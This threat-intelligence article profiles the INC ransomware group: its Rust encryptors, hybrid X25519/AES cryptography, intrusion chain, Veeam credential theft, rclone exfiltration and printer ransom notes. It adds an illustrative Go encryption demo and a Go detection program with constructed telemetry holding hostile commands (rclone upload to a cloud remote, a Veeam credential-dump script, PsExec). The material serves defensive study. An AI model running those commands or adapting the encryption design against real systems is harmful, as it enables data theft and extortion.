Evolution of the INC Ransomware Ecosystem: From Emerging Threat to Top-Tier RaaS
The INC ransomware group has gone from a niche emerging threat to one of the most prolific Ransomware-as-a-Service (RaaS) operations of 2026. Since first appearing in 2023, the group has claimed more than 800 victims. By capitalizing on the vacuum left by competitors, INC has aggressively expanded its affiliate network and cemented its position in the cybercriminal hierarchy.
Recent campaign telemetry shows a two-pronged extortion approach: traditional data theft with the threat of exposure (double extortion), coupled with high-impact psychological pressure. Notably, the group has begun sending ransom demands to networked printers, so the demand appears on paper throughout the office even where on-screen ransom notes go unnoticed.
Technical Architecture and Tooling Modernization
A critical driver of INC's success is the recent overhaul of its codebase. The group has largely migrated to Rust for both its Windows and Linux/ESXi encryptors. For the threat actor this brings two advantages: builds for several platforms from a single codebase, and harder reverse engineering, because Rust's compiler artifacts, statically linked runtime and containerized build traces are less familiar to analysts and to standard sandbox tooling than those of C/C++ malware.
The Windows payloads are heavily obfuscated PE64 binaries. Some samples are wrapped in VMProtect to defeat automated analysis; other builds are more "naked", exposing clear import tables and native API calls. Despite this variance, static and dynamic analysis confirms the malware is heavily operator-driven: the binaries expose granular control through command-line arguments and use a multi-threaded design, spawning a thread pool sized at four times the CPU core count (CPU cores × 4) to maximize encryption throughput.
To balance speed against system availability, INC implements several encryption modes (fast, medium and slow) and partial-encryption heuristics that encrypt only selected portions of each file. This lets the malware quickly render files unusable, critical headers first, while keeping the host responsive enough to display the ransom instructions to the user.
The cryptographic implementation follows a standard hybrid model:
- Asymmetric/symmetric hybrid: a Curve25519-derived shared secret protects each per-file key; file contents are encrypted with AES or a Salsa20 construction.
- File identification: encrypted files carry a distinctive footer signature and are renamed with a consistent .INC extension.
- Linux/ESXi specialization: on virtualized hosts, the binary uses X25519 ECDH to derive AES-CTR keys. The Linux variant includes routines that enumerate virtual machines via vim-cmd, letting the attacker force them to shut down (a running VM keeps its disk files locked) and so maximize impact across the entire virtualized infrastructure.
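To make the hybrid model concrete, the following is an added illustration written for this article (not INC's code, and not derived from any sample) of the X25519 plus AES-CTR construction described for the Linux/ESXi variant: a fresh ephemeral key pair per file, ECDH against the operator's static public key, the hashed shared secret used as the AES-256-CTR key, and the ephemeral public key stored in a trailer so that only the operator can recompute the secret. The trailer layout, the EXAMPLE-FOOTER marker and the SHA-256 key derivation are assumptions made here; the real footer signature is not reproduced. What the example shows is why recovery hinges on the operator's private key: decryptFile with any other key produces garbage.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/ecdh"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
	"io"
)

// Assumed trailer layout for this illustration (NOT INC's real footer):
//   [ciphertext][32-byte ephemeral X25519 public key][16-byte CTR IV][marker]
var footerMarker = []byte("EXAMPLE-FOOTER") // placeholder, not the real signature

const ephPubLen = 32 // X25519 public key size

// deriveFileKey hashes the X25519 shared secret into a 256-bit AES key.
// A real implementation would use a proper KDF (e.g. HKDF); SHA-256 keeps this short.
func deriveFileKey(shared []byte) []byte {
	k := sha256.Sum256(shared)
	return k[:]
}

// encryptFile: fresh X25519 key pair per file, ECDH with the operator's static
// public key, AES-256-CTR over the contents. The ephemeral private key is discarded;
// only the ephemeral public key travels with the file.
func encryptFile(operatorPub *ecdh.PublicKey, plaintext []byte) ([]byte, error) {
	eph, err := ecdh.X25519().GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	shared, err := eph.ECDH(operatorPub)
	if err != nil {
		return nil, err
	}
	block, err := aes.NewCipher(deriveFileKey(shared))
	if err != nil {
		return nil, err
	}
	iv := make([]byte, aes.BlockSize)
	if _, err := io.ReadFull(rand.Reader, iv); err != nil {
		return nil, err
	}
	ct := make([]byte, len(plaintext))
	cipher.NewCTR(block, iv).XORKeyStream(ct, plaintext)
	out := append(ct, eph.PublicKey().Bytes()...)
	out = append(out, iv...)
	return append(out, footerMarker...), nil
}

// decryptFile needs the operator's static private key to recompute the shared
// secret from the stored ephemeral public key. Without it the per-file key is
// unrecoverable, which is the point of the hybrid design.
func decryptFile(operatorPriv *ecdh.PrivateKey, blob []byte) ([]byte, error) {
	trailer := ephPubLen + aes.BlockSize + len(footerMarker)
	if len(blob) < trailer || !bytes.HasSuffix(blob, footerMarker) {
		return nil, errors.New("missing footer marker: not an encrypted file")
	}
	body := blob[:len(blob)-len(footerMarker)]
	iv := body[len(body)-aes.BlockSize:]
	ephPubBytes := body[len(body)-aes.BlockSize-ephPubLen : len(body)-aes.BlockSize]
	ct := body[:len(body)-aes.BlockSize-ephPubLen]

	ephPub, err := ecdh.X25519().NewPublicKey(ephPubBytes)
	if err != nil {
		return nil, err
	}
	shared, err := operatorPriv.ECDH(ephPub)
	if err != nil {
		return nil, err
	}
	block, err := aes.NewCipher(deriveFileKey(shared))
	if err != nil {
		return nil, err
	}
	pt := make([]byte, len(ct))
	cipher.NewCTR(block, iv).XORKeyStream(pt, ct) // CTR: same operation both ways
	return pt, nil
}

// roundTrip demonstrates the asymmetry: the operator's key recovers the file,
// any other key on the same curve yields garbage (CTR has no MAC, so no error).
func roundTrip(plaintext []byte) (withKey bool, withWrongKey bool, err error) {
	operator, err := ecdh.X25519().GenerateKey(rand.Reader)
	if err != nil {
		return false, false, err
	}
	other, err := ecdh.X25519().GenerateKey(rand.Reader)
	if err != nil {
		return false, false, err
	}
	blob, err := encryptFile(operator.PublicKey(), plaintext)
	if err != nil {
		return false, false, err
	}
	good, err := decryptFile(operator, blob)
	if err != nil {
		return false, false, err
	}
	bad, err := decryptFile(other, blob)
	if err != nil {
		return false, false, err
	}
	return bytes.Equal(good, plaintext), bytes.Equal(bad, plaintext), nil
}

func main() {
	ok, wrong, err := roundTrip([]byte("constructed sample: quarterly-report.xlsx contents"))
	fmt.Println("recovered with operator key:", ok, "| recovered with wrong key:", wrong, "| err:", err)
}
```

Note what this construction does not give a defender: AES-CTR carries no authentication tag, so a wrong key fails silently rather than with an error. Triage tooling should therefore identify affected files by the footer signature and the .INC extension, not by whether a decryption attempt "errors out".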
INC's victimology is global but heavily skewed toward the United States. High-profile victims have included NHS Scotland, Xerox, and the State Bar of Texas. A detailed analysis of the attack chain and evolving TTPs is available from the Acronis Threat Research Unit (TRU).

2026 top ransomware groups (Source: Acronis Threat Research).
The Intrusion Lifecycle: Human-Operated Precision
INC does not rely on automated "spray and pray" tactics; it follows a human-operated playbook. Initial access is typically gained through:
- Targeted spear-phishing campaigns.
- Valid credentials purchased from Initial Access Brokers (IABs).
- Exploitation of known vulnerabilities in public-facing edge devices such as Citrix and Fortinet appliances, and of recent flaws in the SimpleHelp RMM platform.
Once inside a network, the actors perform discovery and lateral movement with a mix of native system tools (living off the land) and legitimate third-party software, including Angry IP Scanner, PsExec, RDP, and various commercial RMM products. For command and control (C2) and hands-on-keyboard access, they frequently deploy Cobalt Strike alongside legitimate remote-access tools such as AnyDesk, ScreenConnect and TeamViewer.

INC ransomware attack chain (Source: Acronis Threat Research).
Targeting Backups and Defeating Recovery
A significant recent evolution in INC's TTPs is the focus on disrupting recovery. Telemetry has identified a customized credential dumper aimed at Veeam backup servers: a modified version of Veeam-Get-Creds.ps1 with hardcoded SQL connection parameters and support for Veeam's newer salted DPAPI credential encryption. With the stored backup credentials in hand, attackers can reach and destroy backups before the encryption phase even begins.
Defense evasion is equally aggressive. The group uses PsKill and custom process terminators that load vulnerable drivers (BYOVD) to kill security processes, issues DeviceIoControl calls to delete volume shadow copies, and makes targeted attempts to blind Endpoint Detection and Response (EDR) tooling.
Data exfiltration is typically staged with 7-Zip for compression and rclone for transfer to cloud storage providers, which moves data quickly while blending in with legitimate outbound traffic.

Linux/ESXi format (Source: Acronis Threat Research).
Operational Posture and Ecosystem Proliferation
Beyond the code, INC runs a professionalized extortion infrastructure: a private negotiation portal for direct victim contact and a public leak site for "naming and shaming". The recently introduced abuse of networked printers, where the malware submits print jobs containing the ransom demand to office printers, is a psychological lever intended to force rapid decisions.
The group’s influence has also expanded through the secondary market; a 2024 source-code sale led to the emergence of derivative ransomware families, such as Lynx and Sinobi, effectively propagating INC’s techniques across the wider threat landscape.
Defensive Recommendations
To mitigate the risk of an INC intrusion, organizations should prioritize the following:
- Attack surface reduction: patch critical edge vulnerabilities (Citrix, Fortinet, RMM tools such as SimpleHelp) promptly.
- Backup hardening: protect backup server credentials with MFA and monitor specifically for unauthorized access to Veeam or similar environments.
- Behavioral monitoring: implement detection rules for abnormal rclone activity, unauthorized use of PsExec, and unexpected print jobs.
- Credential protection: monitor for execution of credential-dumping scripts and unusual PowerShell activity.
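The staging, lateral-movement and backup-targeting behaviours described above (Veeam-Get-Creds.ps1, PsExec, 7-Zip archives, rclone to a cloud remote, one note pushed to many printers) map onto simple telemetry rules. The following is an added example, not Acronis tooling, run over constructed sample events embedded in the block. The JSON field names and the print-event shape are assumptions for the example; in practice the parser would be adapted to the EDR's or Sysmon's process-creation schema and, for print jobs, to Microsoft-Windows-PrintService/Operational event 307.

```go
package main

import (
	"bufio"
	"encoding/json"
	"fmt"
	"regexp"
	"strings"
)

// Event is a simplified telemetry record; the field names are an assumption for this
// example. Process events carry image/cmdline, print events carry printer/doc.
type Event struct {
	Time    string `json:"ts"`
	Host    string `json:"host"`
	User    string `json:"user"`
	Image   string `json:"image,omitempty"`
	CmdLine string `json:"cmdline,omitempty"`
	Printer string `json:"printer,omitempty"`
	Doc     string `json:"doc,omitempty"`
}

type Alert struct{ Rule, Host, Detail string }

var (
	// rclone copy/sync/move to a named remote ("remote:path"). Requiring two or more
	// characters before the colon keeps local drive letters such as "D:" from matching.
	rcloneRe   = regexp.MustCompile(`(?i)\brclone(\.exe)?\b.*\b(copy|sync|move)\b.*\s[a-z0-9_-]{2,}:`)
	psexecRe   = regexp.MustCompile(`(?i)(^|\\)psexe(c|svc)(64)?\.exe$`)
	veeamRe    = regexp.MustCompile(`(?i)veeam-get-creds|VeeamBackup.*(Credentials|password)`)
	sevenZipRe = regexp.MustCompile(`(?i)\b7z[ag]?(\.exe)?\s+a\b`) // "7z a ..." archive creation
)

const printFanOutThreshold = 3 // one user sending the same document to this many printers

func evaluateProcess(e Event) []Alert {
	var out []Alert
	add := func(rule, detail string) { out = append(out, Alert{Rule: rule, Host: e.Host, Detail: detail}) }
	if rcloneRe.MatchString(e.CmdLine) {
		add("exfil-rclone-remote", e.CmdLine)
	}
	if psexecRe.MatchString(e.Image) {
		add("lateral-psexec", e.Image)
	}
	if strings.Contains(strings.ToLower(e.Image), "powershell") && veeamRe.MatchString(e.CmdLine) {
		add("veeam-credential-dump", e.CmdLine)
	}
	if sevenZipRe.MatchString(e.CmdLine) {
		add("staging-7zip-archive", e.CmdLine)
	}
	return out
}

// scanEvents applies the per-event rules to process records and a fan-out rule to
// print records (same user, same document, many printers), alerting once per pair.
func scanEvents(jsonl string) ([]Alert, error) {
	var alerts []Alert
	seen := map[string]map[string]bool{} // "user|doc" -> set of printers
	sc := bufio.NewScanner(strings.NewReader(jsonl))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if line == "" {
			continue
		}
		var e Event
		if err := json.Unmarshal([]byte(line), &e); err != nil {
			return nil, fmt.Errorf("bad event %q: %w", line, err)
		}
		if e.Printer != "" {
			key := e.User + "|" + e.Doc
			if seen[key] == nil {
				seen[key] = map[string]bool{}
			}
			seen[key][e.Printer] = true
			if len(seen[key]) == printFanOutThreshold {
				alerts = append(alerts, Alert{Rule: "print-job-fan-out", Host: e.Host, Detail: key})
			}
			continue
		}
		alerts = append(alerts, evaluateProcess(e)...)
	}
	return alerts, sc.Err()
}

// Constructed sample telemetry (not real logs); backslashes are JSON-escaped.
const sampleTelemetry = `
{"ts":"2026-01-10T02:11:05Z","host":"WS-042","user":"CORP\\alice","image":"C:\\Windows\\System32\\notepad.exe","cmdline":"notepad.exe notes.txt"}
{"ts":"2026-01-10T02:14:31Z","host":"FS-01","user":"CORP\\svc_backup","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -ep bypass -f C:\\Temp\\Veeam-Get-Creds.ps1"}
{"ts":"2026-01-10T02:20:07Z","host":"JUMP-01","user":"CORP\\admin7","image":"C:\\Temp\\PsExec64.exe","cmdline":"PsExec64.exe \\\\FS-01 -s cmd.exe"}
{"ts":"2026-01-10T02:41:50Z","host":"FS-01","user":"CORP\\svc_backup","image":"C:\\Temp\\7z.exe","cmdline":"7z.exe a -p -mhe=on D:\\stage\\fin.7z D:\\Finance"}
{"ts":"2026-01-10T02:58:12Z","host":"FS-01","user":"CORP\\svc_backup","image":"C:\\Temp\\rclone.exe","cmdline":"rclone.exe copy D:\\stage mega:drop --transfers 32"}
{"ts":"2026-01-10T03:05:00Z","host":"PRINT-01","user":"CORP\\alice","printer":"PRN-HQ-1","doc":"invoice-0931.pdf"}
{"ts":"2026-01-10T03:30:01Z","host":"PRINT-01","user":"CORP\\svc_backup","printer":"PRN-HQ-1","doc":"note.txt"}
{"ts":"2026-01-10T03:30:02Z","host":"PRINT-01","user":"CORP\\svc_backup","printer":"PRN-HQ-2","doc":"note.txt"}
{"ts":"2026-01-10T03:30:03Z","host":"PRINT-01","user":"CORP\\svc_backup","printer":"PRN-FLOOR2","doc":"note.txt"}
{"ts":"2026-01-10T03:30:04Z","host":"PRINT-01","user":"CORP\\svc_backup","printer":"PRN-FLOOR3","doc":"note.txt"}
`

func main() {
	alerts, err := scanEvents(sampleTelemetry)
	if err != nil {
		panic(err)
	}
	for _, a := range alerts {
		fmt.Printf("[%s] %s: %s\n", a.Rule, a.Host, a.Detail)
	}
}
```

The rules are deliberately narrow: rclone is flagged only when the target is a named remote, PsExec is matched on the image name including its PSEXESVC service binary, and the print rule keys on fan-out rather than on any ransom-note filename, which the operator can change at will. In production these would be tuned against the organisation's own baseline (backup operators legitimately run rclone to a sanctioned remote, for instance) and joined with the user context, since a backup service account driving 7-Zip, rclone and the print queue in the same hour is the sequence the section above describes.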
Indicators of Compromise (IOCs)
Hashes (SHA-256)
589d9480fbfec2d8e61638eb0b537183d0f9977411fd1d2c0f8eb611feebe880
7f37351979c249417cb180b4ede0ed17e5fe2a1f08add4d72606b589f8fdb245
5cc212f84d2bf3fbab165aaf09b16e00fcf2f1ccd880d24b14404c53dcdbf241
60aeb9f7bccf377ff02ed64783e66a62c0f976878d9729b067bc7e5b0b9da9d6
6cd349eda0fa6c8b274a0920852c68f8b727afea1fdbc69ad183cef05d9cf141